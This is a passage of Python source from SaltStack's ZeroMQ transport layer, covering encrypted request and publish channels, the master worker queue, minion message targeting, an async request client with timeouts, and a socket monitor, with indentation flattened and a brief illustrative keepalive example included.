with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if "master_uri" in self.opts:
return self.opts["master_uri"]
# if by chance master_uri is not there..
if "master_ip" in self.opts:
return _get_master_uri(
self.opts["master_ip"],
self.opts["master_port"],
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_ret_port"),
)
# if we've reached here something is very abnormal
raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts")
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if "key" not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
"""
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not always have data; for example, for salt-call ret
# submission this is a blind communication: we do not subscribe to
# return events, we just upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# Attempt the transfer; on auth errors, re-authenticate and retry below.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
"""
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of attempts to make before failing
:param int timeout: The number of seconds on a response before failing
"""
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(
load, tries=tries, timeout=timeout, raw=raw
)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
"""
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
"""
async_methods = [
"connect",
"_decode_messages",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.ttype = "zeromq"
self.io_loop = kwargs.get("io_loop")
self._closing = False
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(
salt.utils.stringutils.to_bytes(self.opts["id"])
).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts["zmq_filtering"]:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast")
if self.opts.get("__role") == "syndic":
self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic")
else:
self._socket.setsockopt(
zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b"")
self._socket.setsockopt(
zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"])
)
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, "TCP_KEEPALIVE"):
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
recon_delay = self.opts["recon_default"]
if self.opts["recon_randomize"]:
recon_delay = randint(
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
)
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
recon_delay,
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts["recon_default"] + self.opts["recon_max"],
)
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"])
if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr(
zmq, "IPV4ONLY"
):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if self._closing is True:
return
self._closing = True
if hasattr(self, "_monitor") and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, "_stream"):
self._stream.close(0)
elif hasattr(self, "_socket"):
self._socket.close(0)
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4506)) != 4506:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
log.debug(
"Connecting the Minion to the Master publish port, using the URI: %s",
self.master_pub,
)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
"""
Return the master publish port
"""
return _get_master_uri(
self.opts["master_ip"],
self.publish_port,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
"""
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
"""
messages_len = len(messages)
# if it was one message, then it's the old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (
self.opts.get("__role") != "syndic"
and message_target not in ("broadcast", self.hexid)
) or (
self.opts.get("__role") == "syndic"
and message_target not in ("broadcast", "syndic")
):
log.debug("Publish received for not this minion: %s", message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(
"Invalid number of messages ({}) in zeromq pubmessage from master".format(
messages_len
)
)
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
"""
Return the current zmqstream, creating one if necessary
"""
if not hasattr(self, "_stream"):
self._stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
return self._stream
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
"""
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
self._monitor = None
self._w_monitor = None
def zmq_device(self):
"""
Multiprocessing target for the zmq queue device
"""
self.__setup_signals()
salt.utils.process.appendproctitle("MWorkerQueue")
self.context = zmq.Context(self.opts["worker_threads"])
# Prepare the zeromq sockets
self.uri = "tcp://{interface}:{ret_port}".format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts["mworker_queue_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting mworker_queue niceness to %d",
self.opts["mworker_queue_niceness"],
)
os.nice(self.opts["mworker_queue_niceness"])
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Setting up the master communication server")
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise
except (KeyboardInterrupt, SystemExit):
break
def close(self):
"""
Cleanly shutdown the router socket
"""
if self._closing:
return
log.info("MWorkerQueue under PID %s is closing", os.getpid())
self._closing = True
if getattr(self, "_monitor", None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, "_w_monitor", None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, "clients") and self.clients.closed is False:
self.clients.close()
if hasattr(self, "workers") and self.workers.closed is False:
self.workers.close()
if hasattr(self, "stream"):
self.stream.close()
if hasattr(self, "_socket") and self._socket.closed is False:
self._socket.close()
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
"""
Starts ZMQ monitor for debugging purposes.
:return:
"""
# The socket monitor shall be used only for debugging
# purposes, so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
log.debug("Starting ZMQ monitor")
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
log.debug("ZMQ monitor has been started")
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to be called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
"""
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Worker binding to socket %s", self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
"""
Handle incoming messages from underlying TCP streams
:param ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
"""
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == "AuthenticationError":
log.debug(
"Minion failed to auth to master. Since the payload is "
"encrypted, it is not known which minion failed to "
"authenticate. It is likely that this is a transient "
"failure due to the master rotating its public key."
)
else:
log.error("Bad load from minion: %s: %s", exc_type, exc)
stream.send(self.serial.dumps("bad load"))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict):
log.error(
"payload and load must be a dict. Payload was: %s and load was %s",
payload,
payload.get("load"),
)
stream.send(self.serial.dumps("payload and load must be a dict"))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth":
stream.send(self.serial.dumps(self._auth(payload["load"])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send("Some exception handling minion payload")
log.error("Some exception handling a payload from minion", exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.send(self.serial.dumps(ret))
elif req_fun == "send":
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == "send_private":
stream.send(
self.serial.dumps(
self._encrypt_private(
ret,
req_opts["key"],
req_opts["tgt"],
)
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.send("Server-side exception handling payload")
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = "{} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
"""
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
"""
if hasattr(zmq, "TCP_KEEPALIVE") and opts:
if "tcp_keepalive" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"])
if "tcp_keepalive_idle" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"])
if "tcp_keepalive_cnt" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"])
if "tcp_keepalive_intvl" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"])
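# --- Illustrative sketch (added for exposition, not part of the original
# module). A minimal, hedged example of applying keepalive opts to a plain
# pyzmq socket; the option values below are hypothetical (-1 means "use the
# OS default" for these zmq options).
def _example_tcp_keepalive():
    context = zmq.Context()
    sock = context.socket(zmq.REQ)
    opts = {
        "tcp_keepalive": 1,         # enable keepalive probes
        "tcp_keepalive_idle": 300,  # seconds of idle time before probing
        "tcp_keepalive_cnt": -1,    # OS default probe count
        "tcp_keepalive_intvl": -1,  # OS default probe interval
    }
    _set_tcp_keepalive(sock, opts)
    return sock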
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
"""
Encapsulate synchronous operations for a publisher channel
"""
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000))
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info("Starting the Salt Publisher on %s", pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug("Publish daemon getting data from puller %s", pull_uri)
package = pull_sock.recv()
log.debug("Publish daemon received payload. size=%d", len(package))
unpacked_package = salt.payload.unpackage(package)
unpacked_package = salt.transport.frame.decode_embedded_strs(
unpacked_package
)
payload = unpacked_package["payload"]
log.trace("Accepted unpacked package from puller")
if self.opts["zmq_filtering"]:
# if you have a specific topic list, use that
if "topic_lst" in unpacked_package:
for topic in unpacked_package["topic_lst"]:
log.trace(
"Sending filtered data over publisher %s", pub_uri
)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(
hashlib.sha1(
salt.utils.stringutils.to_bytes(topic)
).hexdigest()
)
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent")
# Syndic broadcast
if self.opts.get("order_masters"):
log.trace("Sending filtered data to syndic")
pub_sock.send(b"syndic", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent to syndic")
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace(
"Sending broadcasted data over publisher %s", pub_uri
)
pub_sock.send(b"broadcast", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Broadcasted data has been sent")
else:
log.trace(
"Sending ZMQ-unfiltered data over publisher %s", pub_uri
)
pub_sock.send(payload)
log.trace("Unfiltered data has been sent")
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise
except KeyboardInterrupt:
log.trace("Publish daemon caught KeyboardInterrupt, tearing down")
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
"""
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
"""
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
"""
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
"""
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
"""
Disconnect an existing publisher socket and remove it from the local
thread's cache.
"""
if hasattr(self._sock_data, "sock"):
self._sock_data.sock.close()
delattr(self._sock_data, "sock")
def publish(self, load):
"""
Publish "load" to minions. This sends the load to the publisher daemon
process which does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list":
int_payload["topic_lst"] = load["tgt"]
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"])
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so zmq can target them
int_payload["topic_lst"] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
"Sending payload to publish daemon. jid=%s size=%d",
load.get("jid", None),
len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug("Sent payload to publish daemon.")
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class around AsyncReqMessageClient to avoid blocking while waiting to write data to the socket.
"""
def __init__(self, opts, args=None, kwargs=None):
self._closing = False
super().__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# TODO: unit tests!
class AsyncReqMessageClient:
"""
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
"""
def __init__(self, opts, addr, linger=0, io_loop=None):
"""
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The ZeroMQ URI of the master to connect to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
"""
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
try:
if self._closing:
return
except AttributeError:
# We must have been called from __del__
# The python interpreter has nuked most attributes already
return
else:
self._closing = True
if hasattr(self, "stream") and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, "stream"):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug("Trying to connect to: %s", self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self.socket, io_loop=self.io_loop
)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timed out
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug("Re-init ZMQ socket: %s", err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
"""
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
"""
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(
self, message, timeout=None, tries=3, future=None, callback=None, raw=False
):
"""
Return a future which will be completed when the message has a response
"""
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message
)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor:
__EVENT_MAP = None
def __init__(self, socket):
"""
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
"""
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(
self._monitor_socket, io_loop=io_loop
)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
